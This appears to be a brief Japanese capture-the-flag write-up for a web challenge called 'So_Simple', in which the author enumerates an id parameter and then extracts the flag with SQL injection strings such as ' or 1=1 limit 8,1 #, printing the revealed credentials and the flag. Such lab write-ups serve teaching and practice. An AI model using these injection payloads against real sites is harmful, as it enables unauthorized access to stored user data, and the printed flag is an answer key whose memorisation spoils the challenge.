So_Simple
Mr.Ghost
"Try Harder" may be You get flag manually
Try id as parameter
http://sosimple.darkarmy.xyz/
まずは何から始めるか
ソースコードを見ても怪しい所がない。
Try id as parameter
とあるので、GETパラメタでidを指定してみる。
/?id=admin
特に何も起きない…
色々試すと/?id=1
が刺さる。
Your Login name:LOL Your Password:Try
ほう。
/?id=2
Your Login name:Try Your Password:another
/?id=3
Your Login name:fake Your Password:p@ssword
一杯あるなぁ・・・
/?id=8
Your Login name:admin Your Password:darkCTF{this_is_not_a_flag}
あ!これだ! …違うじゃん
SQL Injection
冷静に考えればSQL Injectionを試してなかった。
' or 1=1 #
としてみると、id=1のユーザーが出てくる。
' or 1=1 limit 7,1 #
としてみると、id=8のユーザーが出てくる。
この次はどうだろうか。
' or 1=1 limit 8,1 #
としてみると、以下情報が抜き出せる。
Your Login name:flag Your Password:darkCTF{uniqu3_ide4_t0_find_fl4g}